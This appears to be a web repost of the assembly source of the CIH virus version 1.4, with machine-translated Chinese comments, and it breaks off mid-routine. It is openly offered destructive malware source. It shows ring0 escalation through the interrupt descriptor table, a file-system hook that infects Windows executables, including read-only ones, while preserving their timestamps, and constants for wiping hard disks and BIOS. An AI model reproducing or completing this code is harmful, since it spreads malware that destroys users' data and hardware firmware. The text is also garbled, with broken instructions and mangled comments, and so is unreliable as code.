CiH virus 1.4 version of Chinese comment

xiaoxiao2021-03-06  61

*********************************************************** *************************; * The Virus Program Information *; **************** *********************************************************** *********; * *; * Designer: CIH Source: Ttit of Tatung in Taiwan *; * Create Date: 04/26/1998 now version: 1.4 *; * modification Time: 05/31 / 1998 *; * Turbo Assembler Version 4.0: Tasm / M CiH *; * Turbo Link Version 3.01: TLINK / 3 / T CIH, CiH.exe *; Compilation connection method; * *; use turboassembler; * = ============================================================================================================================================================================================================= ======================= *; can be found in Borland C 3.1; * mode history *; * =========== ============================================================================================================================================================================================================= ============= *; * v1.0 1. Create the Virus Program. *; * 2. The Virus Modifies IDT TO GET RING0 privilege. *; * 04/26/1998 3. Virus Code does not Reload into System *;. * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System *;. * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook *;. * 6. When System Op ENS EXISTING PE File, The File Will Be *; * Infected, and The File Doesn't Be Reinfected. *;

* 7. IT IS Also Infected, Even the file is read-only. *; * 8. When the file is infected, the model Date and time *; * of the file also don't be change. *; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call *; * Previous FileSystemApiHook, it will Call the Function *; * that the IFS Manager Would Normally Call to Implement *; * this Particular I / O Request *;. * 10. The Virus Size is online 656 bytes. *; * =================================================================== ==============================================================================================================================0000 Increase *; * it's size ... ^ __ ^ *; * 05/15/1998 2. hook and modify structured exception handing. *; * When Exception Error Occurs, OOS System Should Be in *; * Windows NT. So My Cute Virus Will Not Continue To Run, *; * IT Will Jmup To Original Application To Run. *; * 3. Use Better Algorithm, Reduce Virus Code Size. *; * 4. The Virus "Basic" Size Is Only 796 BYtes . *; * ============================================================================================================================================================================== === =================================== *; * v1.2 1. Kill All HardDisk, and Bios ... super ... killer ... *; * 2. modify the bug of v1.1 *;

* 05/21/1998 3. The Virus "Basic" size is 1003 bytes. *; * ============================= ====================================================== *; * V1. 3 1. Modify the bug That Winzip self-extractor ocurs error. *; * So when open winzip self-extractor ==> don't infect it. *; * 05/24/1998 2. The Virus "Basic" Size IS 1010 BYTES. *; * ============================================= ======================================= *; * v1.4 1. Full modify the bug: Winzip self-extractor Occurs Error. *; * 05/31/1998 3. Modify Virus Version Copyright. *; * 4. The Virus "Basic" size is 1019 bytes. *; ****** *********************************************************** ********************. 586P; 586 protection mode assembly; ********************* *********************************************************** ****; * ORIGINAL PE EXECUTABLE FILE (Don't Modify this section) *; ***************************************** ******************************************* ORIGINALAPPEXE Segment FileHeader: ;

Compile the connected PE format executable file header DB 04DH, 05AH, 090H, 000H, 003H, 000H, 000H, 0FFH, 0FFH, 000H, 000H DB 0B8H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H DB 000H, 000H, 000H DB 000H, 000H, 000H DB 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H DB 000H, 000H, 000H, 000H, 080H, 000H, 000H, 000H DB 00, 01FH, 0BAH, 00Eh, 000H, 0B4H, 009H, 0CDH DB 021H, 0B8H, 001H, 04CH, 0CDH, 021H, 054H, 068H DB 069H, 073H, 020H, 070H, 072H, 06FH, 067H, 072H DB 061H, 06DH, 020H, 063H, 061H, 06EH, 06EH, 06FH DB 074H, 020H, 062H, 065H, 020H, 072H, 075H, 06EH DB 020H, 069H, 06EH, 020H, 044H, 04FH, 053H, 020H DB 06DH, 06FH, 064H, 065H, 02EH, 00DH, 00DH, 065H, 02EH, 00DH, 00DH, 065H, 02EH, 00DH, 00Dh, 00AH DB 024H, 000H, 000H DB 050H, 045H, 000H, 000H, 04CH, 001H, 001H, 000H DB 0F1H, 068H, 020H, 035H, 000H, 000H, 000H, 000H DB 000H, 000H, 000H, 000H, 0E0H, 000H, 001H, 005H, 000H, 000H 010h, 000H, 000H, 000H, 000H, 000H, 000H DB 010H, 010H, 000H, 000H, 010H, 000H, 000H DB 000H, 020H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H , 040H, 000H DB 000H, 010H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H DB 004H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H 000H DB 000H, 020H, 000H, 000H DB 000H, 000H, 000H, 002H, 000H, 000H, 000H, 000H, 010H, 000H, 000H, 000H, 010H, 000H, 000H, 000H DB 000H, 000H, 000H, 000H DB 000H, 000H, 000H, 000H, 010H, 000H, 000H DB 000H, 000H, 000H, 000H, 000H, 000H, 000H DB 000H 000H, 000H, 000H DB 000H, 000H, 000H, 000H, 000H, 000H, 000H DB 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H,

000H, 000H, 000H, 000H, 000H, 000H, 000H DB 000H, 000H, 000H, 000H, 000H, 000H DB 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H DB 000H, 000H, 000H, 000H DB 000H, 000H, 000H, 000H, 000H, 000H DB 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H 000H DB 000H, 000H, 000H, 000H DB 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H DB 000H, 000H, 000H DB 000H, 000H, 000H, 000H, 000H, 000H, 000H DB 000H, 000H, 000H, 000H, 000H, 000H, 000H DB 02EH, 074H, 065H, 078H, 074H, 000H, 000H, 000H, 010H, 000H, 000H, 010H, 000H, 000H, 002H, 000H, 000H DB 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 020H, 000H, 000H, 000H, 000H, 000H, 000H, 000H DB 000H, 000H, 000H DB 000H, 000H, 000H, 000H DB 000H, 000H, 000H, 000H DB 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H DB 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H DB 000H, 000H, 000H, 000H, 000H, 000H DB 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H DB 000H, 000H, 000H, 000H DB 000H, 000H, 000H, 000H, 000H, 000H DB 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H 000H DB 000H, 000H, 000H, 000H DB 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H DB 0C3H, 000H, 000H, 000H, 000H, 000H, 000H, 000H DD 00000000h,

Virussize OriginalAppexe Ends; ***************************************************** *****************************; * My Virus game *; ************* *********************************************************** ************; **************************************************** ************* * CONSTANT Define *; ********************** ******************************************* TRUE = 1 false = 0 debug = false majorvirusversion = 1; main version number MinorVirusVersion = 4; Minor version number VirusVersion = MajorVirusVersion * 10h MinorVirusVersion; synthetic version iF dEBUG; whether debugging FirstKillHardDiskNumber = 81h; kill second hard disk "d:" HookExceptionNumber = 05h; No. 5 using the interrupt ELSE FirstKillHardDiskNumber = 80h; kill the first hard disk "C:" hookExceptionNumber = 03h; use 3 interrupt Endif FileNameBuffersize = 7fh; ************************* *********************; ********************* ************************************** Virusgame Segment Assume Cs: Virusgame, DS: Virusgame SS: Virusgame Assute ES: Virusgame, FS: Virusgame, GS: Virusgame; ********************************************** ********************** * Ring3 virus game initial program *; ************************************************** **************** MYVIRUSSTART: PUSH EBP; ************************************************** ********; * let's modify structured exception *; * handing, prevent exception error *; * ioccurrence, especially in nt. *; *************** ********************* Lea EAX, [ESP-04H * 2] xor EBX, EBX XCHG EAX, FS: [EBX] Call @ 0 @ 0: POP EBX; get the program start offset?; use this offset relative offset to get absolute addresses (the virus program is used in large quantity) Lea ECX,

STOPTORUNVIRUSCODE- @ 0 [EBX] Push ECX PUSH EAX; *************************; *'S modify *; * idt (Interrupt Descriptor Table) *; * to get ring0 privilege ... *; ********************************** *********** PUSH EAX; SIDT [ESP-02H]; GET IDT BASE Address?; Get the base address of the interrupt descriptor table to EBX POP EBX; add EBX, hookExceptionNumber * 08H 04H; ZF = 0; calculate the base address to EBX CLI to use the interrupt; MOV EBP, [EBX]; GET EXCEPTION BASE MOV BP, "ENTRY POINT?; Achieve interrupt base address to EBP LEA ESI, MyExceptionHook- @ 1 [ECX] Push ESI?; ESI is the viral interrupt routine address MOV [EBX-04H], Si; SHR ESI, 16; Modify Exception MOV [EBX 02H], Si; Entry Point Address Modify the interrupt base address to point to the viral interrupt routine POP ESI; ******************************************** *; * Generate exception to get ring0 *; ********************************* INT hookexceptionNumber; GENERATEEXCEPTION; into the interrupted method into the 0th ReturnadDressofendexception = $; ******************************************************** ; * Merge All Virus code section *; ********************************** PUSH ESI MOV ESI Eax; ESI points to the virus to the beginning of LoopofmergeallViruscodeec TION: MOV ECX, [EAX-04H] REP MOVSB; Copy Virus Code to Allocated System Memory Adjust Sub Eax, 08h MOV ESI, [EAX] or ESI, ESI JZ QuitloopofmergeAllVirusCodeSecion; zf = 1; Copy JMP loopofmergeAllViruscodeSecion; Copy the next paragraph QuitloopofmerGeallviruscodese: Pop ESI; *************************; * Generate Exception Again *; *********************************** INT hookExceptionNumber; generateException AGA; again enter level 0 ; ***************************; * let's rest's restore *; * structured exception handing *; ********************************************** READYRESTORESE: STI; open Interrupt XOR EBX, EBX JMP Restorese; ***********************************; * WHEN Exception Error Occurs,

*; *; * SO my Cute Virus Will Not *; * Continue To Run, IT JMups to *; * Original Application To Run. *; ********** ************************* StoptorUnviruscode: @ 1 = Stoptorunviruscode XOR EBX, EBX MOV EAX, FS: [EBX] MOV ESP, [EAX ] Restorese: POP DWORD PTR FS: [EBX] POP ​​EAX; ****************************************************** *; * Returnal app to execute *; ******************************************************* PUP EBP PUSH 00401000H; Push ORIGINALADDRESSOFENTRYPOINT = $-4; app entry point to stack; put the original program start address stack return; return to original app entry point; return to the beginning of the original program as a child program; **** *********************************************************** ***; * ring0 virus game game initial program *; ************************************************** **************************** MYEXCEPTIONHOOK: @ 2 = MyExceptionHook JZ InstallmyFileSystemapiHook; if the virus code has been copied; go to the program to install the file system hook; ***** ********************************; * Do My Virus EXIST IN System!? *; ***** ******************************* MOV ECX, DR0; see if DR0 is set (DR0 is a virus resident mark) Jecxz AllocateSystemMemoryPage; no setup, allocate system memory add dword ptr [ESP], readyrestore-returnaddressofendexception; ****************************** ***************; * RETURN TO RING3 Initial Program *; ***************************************** ************ EXITRING0INIT: MOV [EBX-04H], BP; SHR EBP, 16; Restore Exception MOV [EBX 02H], BP;; Restore the original interrupt base IRETD; interrupt return ; ************************************; * Allocate SystemMemory Page to use *; *** ******************************************** AllocateSystemMemoryPage: MOV DR0, EBX; SET THE MARK OF MY Virus Exist in System Set DR0, it is a sign of the virus resides, PUSH 00000000FH; Push Ecx; Push 0ffffffh; Push ECX; Call Method Ulong Extern _PageAllocate (Ulong Npages, Ulong Ptype, Ulong VM, Ulong Alignmask, ulong minphys,

ULONG maxPhys, ULONG * PhysAddr,; ULONG flags); push ecx; push ecx; push 000000001h; push 000000002h; int 20h; VMMCALL _PageAllocate; VXD call _PageAllocate = $; dd 00010053h; Use EAX, ECX, EDX, and flags add ESP, 08H * 04H; Recovery Stack Pointer Xchg EDI, ED; EDI = SystemMemory Start Address; EDI points to allocated system memory first LEA EAX, myvirusstart- @ 2 [ESI]; ESi] To the virus beginning with IRetd; return to ring3 Initial program; exit interruption, back to level 3 (return "Merge All Virus Code Section"); ************************************ ********; * Install my file system API hook *; ***************************************** ***** InstallMyFileSystemApiHook: lea eax, FileSystemApiHook- @ 6 [edi]; points to the file system hooks first address push eax; int 20h; VXDCALL IFSMgr_InstallFileSystemApiHook IFSMgr_InstallFileSystemApiHook = $; dd 00400067h; Use EAX, ECX, EDX, and flags; after the call becomes call [IFSMgr_InstallFileSystemApiHook] mov dr0, eax; save OldFileSystemApiHook address; save the original file system access into the first hooks DR0 (modified call return value is the previous value chain) pop eax; EAX = FileSystemApiHook address; save Old IFSMGR_INSTALLESYSTEMAPIHOK Entry Point Mov ECX, IFS Mgr_InstallFileSystemApiHook- @ 2 [esi] mov edx, [ecx]; edx function as IFSMgr_InstallFileSystemApiHook address mov OldInstallFileSystemApiHook- @ 3 [eax], edx;? Preservation; Modify IFSMgr_InstallFileSystemApiHook Entry Point lea eax, InstallFileSystemApiHook- @ 3 [eax] mov [ ECX],

EAX?; Set the address called the new IFSMGR_INSTALLSYSTEMAPIHOOK function; make the INSTALLSYSTEMAPIHOK CLI JMP EXITRING0INIT?; exit 0 (INT 3 or INT 5); *************************** *************************************; * Code size of merge virus code section *; * *********************************************************** ****** CODESIZEOFMERGEVIRUSCODESECTION = offset $; ************************************************** *****************; * IFSMGR_INSTALLSYSTEMAPIHOK *; *********************************** **************************************** InstallFileSystemapiHook:; new IFSMGR_INSTALLESYSTEMAPIHOK function calls push ebx call @ 4; @ 4:; pop ebx ; mov ebx, offset FileSystemApiHook; obtain the current instruction address offset add ebx, FileSystemApiHook- @ 4; the difference plus an offset offset = FileSystemApiHook push ebx int 20h; VXDCALL IFSMgr_RemoveFileSystemApiHook; VXD removed call directed hook IFSMgr_RemoveFileSystemApiHook FileSystemApiHook = $ DD 00400068H; Use Eax, ECX, EDX, And Flags; call number Pop Eax; call original ifsmgr_installfilesystemapihook; to link client FileSystemapihook Push DWORD PTR [ESP 8] Call OldInstallFile SystemApiHook- @ 3 [ebx]; call the original function to set the hook IFSMgr_InstallFileSystemApiHook pop ecx push eax; Call Original IFSMgr_InstallFileSystemApiHook; to Link My FileSystemApiHook push ebx call OldInstallFileSystemApiHook- @ 3 [ebx]; call the original function to set the hook IFSMgr_InstallFileSystemApiHook pop ecx mov dr0 ,

Eax; Adjust OldFileSystemapiHook Address; Adjust the original address POP EBX RET; ********************************************* **************; * static data *; ********************** ************************************ OLDINSTALLSYSTEMAPIHOK DD?; The original InstallFileSystemapiHook called the address; *** *********************************************************** ****; * ifsmgr_filesystemHOK *; ************************************************************* ***************; ***************************************** ****; * ifsmgr_filesystemhook entry point *; ******************************************** FILESYSTEMAPIHOKIOK: Installed file system hook @ 3 = filesystemapihook pushad; save register (20H long) call @ 5; @ 5:; Pop ESI; MOV ESI, OFFSET; ESI is the offset of the current instruction Add ESI, VirusGameDataStartaddress- @ 5; ESI's offset of FileSystemapiHook plus the deviation of VirusGameDataStartAddress = VirusGameDataStartAddress offset; ************************************ ********; * is onbusy !? *; ***************************************** *** TEST BYTE PTR (Onbusy- @ 6) [ESI], 01H; if (Onbusy); Test "Busy" Sign JNZ Pifunc; Goto Pifunc; "Busy" Go to PIFSFUN C; **************************; * is openfile!? *; *** *********************************; if (notopenfile); Goto Prevhook Lea EBX, [ESP 20H 04h 04h]; ebx address FunctionNum; a file system hook call the following format; FileSystemApiHookFunction (pIFSFunc FSDFnAddr, int FunctionNum, int Drive, int ResourceFlags, int CodePage, pioreq pir); co superscript 2 cmp dword ptr [ebx], 00000024H; Test if the call is to open the file; #define ifsfn_open 36 jne prevhook defined in the IFS.H of DDK; not jump to the previous file hook; ************ ***************; * enable onbusy *; ******************** ***************** Inc Byte Ptr (Onbusy- @ 6) [ESI]; Enable Onbusy; Setting "Busy" flag "Bus"; ****** *********************** * GET FilePath's Drivenumber,

*; * Filenamebuffer. *; *********************************************************************************************************************************************************************************************************** **; *; * DRIVENAME IS 'C:'. *; **************************** **********; MOV ESI, OFFSET FileNameBuffer Add ESI, FileNameBuffer- @ 6; ESI points to FileNameBuffer Push ESI; save MOV Al, [EBX 04H]; EBX 4 is the address of INT Drive CMP Al, 0FFH; Whether the Universal Naming Conventions address JE CallUnitobcspath is turned to ADD Al, 40H MOV AH, ':' MOV [ESI], ESI; processing into "x:" in the form of "x:" Inc ESI; * *************************; * Unitobcspath *; ********* ****************************; * this service controls *; * a canonicalized unicode pathname *; converts the CANONICALIZED Unicode characters to ordinary BCS character set; * to a normal pathname in the *; * specified bcs character set. *; ************************************** *********; calling method UniToBCSPath (unsigned char * pBCSPath, ParsedPath * pUniPath, unsigned int maxLength, int charSet) CallUniToBCSPath: push 00000000h; charset push FileNameBufferSize; character length mov ebx, [ebx 10h] MOV Eax, [EBX 0CH] Add Eax, 04H PUSH EAX; UNI Character, Push ESI; BCS Character, INT 20H; vxdcall unitobcspath; call unitobcspath unitobcspath = $ dd 00400041h; call ID add ESP, 04H * 04H; ********** *****************; * IS filename '.exe'!? *; ********** **************************; CMP [ESI EAX-04H], '.exe' CMP [ESI EAX-04H], ' EXE. '; Test is * .exe (executable) file POP ESI JNE DisableOnbusy if debug; *********************************** *********; * ONLY for debug *; ***************************************** ***; CMP [ESI EAX-06H], 'Fuck' CMP [ESI EAX-06H],

The test is "fuck.exe" JNE disableonbusy endif; ******************************** ********; * is open existing file !? *; **************************************** *****; if (notopenexistingfile; goto disableonbusy cmp word PTR [EBX 18H], 01H; Test Whether to open JNE disableonbusy; ****************** *****************; * Get Attributes of the file *; ******************************** ************* mov ax, 4300h; IFSMgr_Ring0_FileIO obtained file attribute number (R0_FILEATTRIBUTES / GET_ATTRIBUTES) int 20h; VXDCall IFSMgr_Ring0_FileIO; IFSMgr_Ring0_FileIO obtained calling function the file attributes IFSMgr_Ring0_FileIO = $ dd 00400032h; call No. JC disableonbusy; fail? Push ECX; *************************; * Get IFSMGR_RING0_FILEIO Address *; ********************************************* MOV EDI, DWORD PTR (IFSMGR_Ring0_Fileio- @ 7) [ESI] MOV EDI, [EDI]; get the address called IFSMGR_RING0_FILEIO; ***************************************** *****; * is read-only file!? *; ***************************************** *** TEST CL, 01H JZ OpenFile; Test is a read-only file; ******************************* ****; * Modify Read-Only File to Write *; ******************************************* MOV AX, 4301H; ifsmgr_ring0_fileio gets the file attribute number (r0_filettributes / set_attributes) xor ECX, ECX Call Edi; vxdcall ifsmgr_ring0_fileio; calls ifsmgr_ring0_fileio to change the file attribute function, make the file can be written; ************* **************; * Open file *; ********************* **************** OpenFile: XOR EAX, EAX MOV AH, 0D5H; IFSMGR_RING0_FILEIO Open File function number (r0_opencreatfile or ro_opencreat_in_context) xor ECX, ECX; file attribute xor Edx, EDX INC EDX MOV EBX, EDX INC EBX; ESI is the first site of the file name Call Edi; vxdcall ifsmgr_ring0_fileio; calls ifsmgr_ring0_fileio Open file function XCHG EBX, EAX; MOV EBX,

FileHandle; save the file handle in EBX; *************************; * NEED TO RESTORE *; * Attributes of the file!? *; ************************************************ ECX PUSHF TEST CL, 01H jz isopenfileok; Does it need to recover file properties (there is no need to recover if write attributes); ************************ ************; * restore attributes of the file *; *************************************** ******** MOV AX, 4301H; IFSMGR_RING0_FILEIO's acquisition file attribute number (R0_FileAttributes / set_attributes) Call Edi; vxdcall ifsmgr_ring0_fileio; restore file properties; *************** *********************; * IS open file ok!? *; ******************* ***************** ISOpenFileok: POPF JC Disableonbusy; Open is successful?; ********************* ***************; * Open file already succeed. ^ __ ^ *; ********************** *************** PUSH ESI; PUSH FileNameBuffer Address to Stack; put the file name data area first stop Pushf; Now cf = 0, Push Flag to Stack; Save flag ADD ESI , DataBuffer- @ 7; MOV ESI, Offset DataBuffer; ESI points to the first place in the data area; *************************; * Get OffsettonewHeader *; ************************* X, EAX MOV AH, 0D6H; IFSMGR_RING0_FILEIO's read file function number (r0_readfile); for doing minimal viruscode's length,; I save eBp. MOV EBP, EAX PUSH 00000004H; Read 4 bytes POP ECX PUSH 0000003CH; read Take a DOS file header offset Windows file header head offset POP EDX CALL EDI; vxdcall ifsmgr_ring0_fileio; read file to ESI MOV EDX, [ESI]; Windows file header head offset to EDX; ****** ************; * GET 'PE / 0' Signature *; * of imagefileHeader, and *; * inflected mark. *; ***** ********************* DEC EDX MOV EAX,

EBP; function number Call Edi; vxdcall ifsmgr_ring0_fileio; read file to ESI; ***************; * is pe!? *; **************************; * is the file *; * already infected!? *; ********* ******************; * Winzip self-extractor *; * doesn't has infected *; * mark Because my virus *; * doessn't infect it. *; **************************; CMP [ESI], '/ 0pe / 0' CMP DWORD PTR [ESI],

00455000H; Judging whether it is a PE file (flag "PE / 0/0") JNE closefile; does not turn off the file; *********************** ***********; * the file is ^ o ^ *; * PE (portable executable) indeed. *; ****************** ******************; * the file isn't also infected. *; ******************* ****************; **************************************** ******; * START to INFECT THE FILE *; **************************************************** **; * registers use status now: *; * *; * eAX = 04h *; * ebx = file handle *; * ECX = 04h *; * Edx = 'pe / 0/0' signature of *; * imagefileheader Pointer's *; * Esi = database *; * EDI = IFSMGR_RING0_FILEIO Address *; * EBP = D600H ==> read data in file *; ********** ***************************; * stack dump: *; * *; * esp => --------- ---------------- *; * | eflag (cf = 0) | *; * -------------------- ----- *; * | filenamebufferpointer | *; * ------------------------ *; * | EDI | *; * ----------------------- *; * | ESI | *; * ------------------ ------- *; * | EBP | *; * ----------------------- *; * | ESP | *; * ----------- -------------- *; * | EBX | *; * ------------------------- *; * | EDX | *; * ------------------------- *; * | ECX | *; * --------- ---------------- *; * | EAX | *; * ------------------------- *; * |------------------------ *; ********************* ************************ PUSH EBX; Save File Handle; Save File Handle Push 00h; Set ViruscodeSectionTableEndmark; ********** ****************; * let's set the *; * virus' infected mark *; ******************* ******** PUSH 01H; Size Push EDX; POINTER OF FILE; EDX points to PE file header offset 00h push edi; address of buffer; EDI is IFS

Mgr_ring0_fileio's address (original note incorrectly); ****************; * save esp register *; ****** ********************* MOV DR1, ESP; *********************** ***; * newdressofentryPoint *; * (only first set size) *; ********************************** Push Eax; Size; ****************; * Let's read *; * image header in file *; ***** ********************** MOV EAX, EBP MOV CL, SIZEOFIMAGEHEADERTOREAD; Word Numberofsections Add Edx, 07h; Move EDX To Numberofsections PE file head 07h is Numberofsections Call Edi; vxdcall ifsmgr_ring0_fileio; read NumberOfsections to ESI; ****************** *******; * let's set the *; * newdressofentrypoint *; * (set pointer of file, *; * address of buffer) *; *************** *********** Lea EAX, (AddressofentryPoint- @ 8) [EDX] Push Eax; Pointer Of File Lea Eax, (Newaddressofentrypoint- @ 8) [ESI] Push Eax; address of buffer; ** ****************; * Move Edx to the start *; * of sectionTable in file *; ***** ******************************* MOVZX EAX, Word Ptr (SizeOfoptionalHeader- @ 8) [ESI] Lea EDX, [EAX EDX 12H]; EDX is SectionTable Offset; **************************; * let's get *; * total size of sections *; ****** ********************* MOV AL, SIZEOFSCETABLE; ScetionTable size (bytes); I Assume Numberofsections <= 0ffh MOV CL, (NumberOfsections- @ 8) [ESI] Mul CL; Each block table is multiplied by block = block size; ********************* ****; * let's set section table *; ****************; Move Esi to the Start of SectionTable Lea ESI, (StartofsectionTable- @ 8) [ESI]; ESI points to block table premiere (in the viral dynamic data area) Push Eax; size; block size Push EDX; POINTER OF FILE; EDX is the offset of SectionTable Push ESI; Address of Buffer ;; *******************

*******; * the code size of merge *; * Virus code section and *; * total size of virus *; * code section table must *; * beall or equal the *; * unused space size of *; ********************************************* Inc ECX PUSH ECX; Save Numberofsections 1 shl ECX, 03H; * 8 Push ECX; Save TotalsizeOfviruscodeSECTIONTABLE; Reserved Virus Block Table Space Add ECX, EAX Add ECX, EDX; ECX File Body Off Sub ECX, (SizeOfheaders- @ 9) [ESI] NOT ECX INC ECX; For file header size-body offset = unused space; SAVE MY Virus First section; Size of Following Section Table ...; (Not Include The size of virus code section) Push ECX XCHG ECX, EAX; ECX = SIZE OF Section Table; ECX is a block size; Save Original Address of Entry Point Mov Eax, (AddressofentryPoint- @ 9) [ESI]; ENT RVA Address Add Eax, (ImageBase- @ 9) [ESI]; load base MOV (OriginalAddressofentrypoint- @ 9) [ESI], EAX; Save the actual entrance address CMP Word PTR [ESP], Small CodesizeOfmergeViruscodeSECTION; unused space and virus first size compare jl onlysetinfectedmark; smaller than the infection mark ; ***************************; * Read All Section Tables *; ************************** MOV EAX, EBP; read function number Call Edi; vxdcall ifsmgr_ring0_fileio; reading block table to ESI (@ 9); **************************; * FULL Modify the bug: *; * Winzip self-extractor *; * Occurs error ... *; ****************; * So when opens *; * winzip self-extractor, *; * Virus doesn't infect it. *; **************************; * first, virus gets the *; * PointertorawData in the *; * Reads the section data, *; * and tests the string of *; * 'Winzip (r)' ... *; ********** ***************** XCHG EAX, EBP PUSH 00000004h Pop ECX; Read 4 Bytes Push Edx Mov Edx, (SizeOfScectionTable PointertorawData- @ 9) [EBX]; EDX is the first Two offset (.rdata) AD

D EDX, 12H; Plus 10H 2H (10h is "winzip ....") Call Edi; vxdcall ifsmgr_ring0_fileio; read 4 bytes to ESI; CMP [ESI], 'Nzip' CMP DWORD PTR [ESI], ' PIZN '; judgment whether it is WinZip self-extracting file JE notsetinfectedmark; if you do not set the infection flag POP EDX; EDX point to block table in the file; ***************** ********; * let's set total virus *; * code section table *; ********************************** ; EBX = My Virus First Section Code; size of Following Section table pop ebx; unused space pop edi; EDI = TotalSizeOfVirusCodeSectionTabl pop ecx; ECX = NumberOfSections 1 push edi; size add edx, ebp; ebp blocks table size push EDX; POINTER OF FILE; After the block table (first block) Add EBP, ESI; EBP points to the block table of the viral data area (first block) Push EBP; address of buffer; ******** *****************; * set the first virus *; * code section size in *; * viruscodeesetable *; ************ ************** LEA EAX, [EBP EDI-04H] MOV [EAX], EBX; setting the size of the virus code first block (unused space size) to the virus block table; **************************; * let's set my virus *; * first section code *; ********* ****************** PUSH EBX; size; the size of the virus code (unused space size) Add Edx, EDI Push EDX; POINTER OF FILE; point to block table (first block) size ?? = virus body (virus began) Lea EDI, (MyvirusStart- @ 9) [ESI] Push EDI; address of buffer; point to virus Divance; ****************; * let's modify the *; * addressofentrypoint to *; * my virus entry point *; ** ************************* MOV (NewaddressofentryPoint- @ 9) [ESI], EDX; save new program entry (virus body); ** ************************; * SETUP Initial Data *; *************************** ********* Lea edx, [ESI-SIZEOFSCETONTABLE]; EDX first reduced one block length to cooperate with the "bid 1" MOV EBP, OFFSET VIRUSSIZE; EBP is the virus length JMP starttowritecodetosections; * *************************; * WRITE CODE TO Sections *; *************** *********** LOOPOFWRITECODETOSECTIONS: Add Edx, SIZ

EOFSCETABLE; Boid 1:; pointing to the next item MOV EBX, (SizeOfrawData- @ 9) [EDX]; EBX is the SizeOfrawData (block size) of the block entry, (virtualsize- @ 9) [EDX]; Subtract Virtualsize = This block is unused by JBE ENDOFWRITECODETOSECTIONS PUSH EBX; SIZE SUB EAX, 08H MOV [EAX], EBX; Write virus block MOV EBX, (PointertorawData- @ 9) [EDX]; EBX is a block of physical ( Actual) Offset? Add ebx, (Virtualsize- @ 9) [EDX]; plus Virtualsize Push Ebx; Pointer Of; EBX pointing to the file pointer Push EDI EDI EDI EDI; Address Of Buffer Mov EBX, (Virtualsize- @ 9) [EDX] Add EBX, (VirtualAddress- @ 9) [EDX] Add EBX, (ImageBase- @ 9) [ESI]; EBX is the actual address MOV [EAX 4], EBX for loading after the block is loaded; Save to MOV EBX, [EAX] in the virus block table; this block unused Space size add (Virtualsize- @ 9) [EDX], EBX; added to the VirtualSize of the block entry; section Contains Initialized Data ==> 00000040H; Section Can Be Read. ==> 40000000H or (Characteristics- @ 9) [EDX], 40000040H; Block Properties of the block entry (change to readable, and include initialization data) StartToWriteCodetosections: Sub EBP, EBX; virus Size - Virus block size JBE setviruscodeTableTablendmark; if it is smaller than (viral insertion), set the virus block table end value Add EDI, EBX; Move Address of buffer; point to the virus Next Endofwritecodetosections: loop loopofwritecodetosections; ********** ******* **********; * ONLY SET INFECTED MARK *; ********************************** ONLYSETINFECTEDMARK: MOV ESP, DR1; only set infection markers JMP WriteviruscodetOfile; jump to the program to write a virus to the file to be infected; *************************; * Not set infread mark *; *********************************** NOTSETINFECTEDMARK: Add ESP, 3CH; does not set infection flag JMP closefile; jump to off Document; *****************; * SET VIRUS code *; * section Table end mark *; ******* ******************** SETVIRUSCODESECTIONTABLEENDMARK:; Adjust Size Of Virus Section Code to Correct Value Add [EBP; Corrected Virus Block Table Last Add [ESP 08H], EBP; SET END MARK XOR EBX, EBX MOV [EAX-04H], EBX; set block table end sign; ********************** *****; * when virusgame calls *; * vxdcall, vmm

Sign In MODIFIES *; **; ********************************************************************* ********; * Before Writing my virus *; * to file, i must restore *; * them first. ^ __ ^ *; *************** *********** LEA EAX, (Lastvxdcalladdress-2- @ 9) [ESI]; the address of the address of the instruction calling VXD MOV CL, VXDCallTables; VxDCallTables, the number of VXD calls, the number of VxD calls, LoopofrestorevxdCallid: MOV Word PTR [EAX], 20CDH; Restore form MOV EDX in "INT 20H", (VxDCallidTable (ECX-1) * 04H- @ 9) [ESI]; Remove the ID number of VXDCallIdTable Remove the vxmov [EAX 2] , edmed; put it behind "int 20h", forming the form of 'Int 20h' and the 'Service Identifier' MOVZX EDX, Byte Ptr (VxdcalladdresStable ECX-1- @ 9) [ESI]; VxDCalLaddresStable is placed in each call The address of the address of the VXD, Eax, EDX; EAX is the last call address loop loopofrestorevxdcallid; restore other calls; *********************************** ***; * let's write *; * virus code to the file *; ********************************** WRITEVIRUSCODETOFILE: MOV EAX, DR1 DR1 is the ESP MOV EBX, [EAX 10H], and EBX is saved in the stack. The saved file handle MOV EDI, [EAX]; EDI is the address of IFSMGR_RING0_FILEIO to save in the stack LOOPOFWRITEVIRUSCODETOFILE: POP ECX; Offset JE of Variation Code CXZ setFileModificationMark; go to virus offset MOV ESI, ECX MOV EAX, 0D601H; write file function number (r0_writefile) POP EDX; file pointer POP ECX; VxDCall IFSMGR_RING0_FILEIO; write file; write入: Variation, virus block table, new file block table, new program entrance, infection flag JMP loopofwriteviruscodetofile; ********************************** ****; * let's set cf = 1 ==> *; * Need to restore file *; * modification time *; ********************** ***** SETFILEMODIFICATIONMARK: 